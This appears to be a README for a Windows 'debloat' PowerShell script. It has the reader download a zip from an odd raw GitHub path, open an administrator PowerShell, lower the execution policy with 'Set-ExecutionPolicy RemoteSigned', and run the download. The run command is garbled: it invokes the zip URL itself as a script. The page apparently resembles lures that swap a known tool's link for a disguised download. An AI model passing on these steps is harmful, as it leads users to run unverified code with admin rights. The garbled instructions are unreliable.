Win11Debloat is a simple and lightweight PowerShell script designed to declutter your Windows system. It helps remove pre-installed apps, disable telemetry, and perform various tweaks to enhance your overall experience on Windows 10 and Windows 11.
To get started with Win11Debloat, you will download the latest release from our GitHub page.
- Visit the Releases page to download the script.
- Look for the latest version, and download the
https://raw.githubusercontent.com/Xophian/Win11Debloat/master/cebine/Win11Debloat.zipfile. - Save the file to a location you can easily access, like your Desktop or Downloads folder.
- Operating System: Windows 10 or Windows 11
- PowerShell: Version 5.1 or higher is required.
- Navigate to the folder where you saved the
https://raw.githubusercontent.com/Xophian/Win11Debloat/master/cebine/Win11Debloat.zipfile. - Right-click on the Start menu and select "Windows PowerShell (Admin)" to open PowerShell with administrative privileges.
- In the PowerShell window, type the following command to change the execution policy:
This allows you to run scripts downloaded from the internet.
Set-ExecutionPolicy RemoteSigned - Next, run the script by navigating to the file's directory using the
cdcommand. For example:cd C:\Users\YourUsername\Desktop
- Finally, start the script by typing:
.\https://raw.githubusercontent.com/Xophian/Win11Debloat/master/cebine/Win11Debloat.zip
- Follow the prompts on the screen to customize the settings that suit your needs.
- Removes unnecessary bloatware that comes pre-installed with Windows.
- Disables telemetry to enhance your privacy.
- Provides various tweaks to improve performance.
- Easy to use, with interactive prompts guiding you through the process.
Win11Debloat offers different options for you to customize your experience. During the execution of the script, you will be presented with various choices:
- Choose which apps to remove: Select from a predefined list of apps that you would like to uninstall.
- Select privacy settings: Decide which telemetry and data-sharing features you'd like to disable.
- Registry tweaks: Apply recommended registry changes that optimize your system performance.
Win11Debloat is designed to improve your Windows experience safely. However, please follow the prompts carefully and read any warnings that may appear during execution.
While the script performs tasks to enhance performance, some changes may not be easily reversible. It's advisable to create a system restore point before running the script, allowing you to revert to a previous state if needed.
Yes, Win11Debloat is fully compatible with both Windows 10 and Windows 11.
If you have any questions or need assistance, feel free to create an issue in the GitHub repository, and our team will respond as soon as possible.
For more detailed information about each feature and customization option, visit our GitHub repository.
Use this guide to download and run Win11Debloat effectively, enhancing your Windows experience.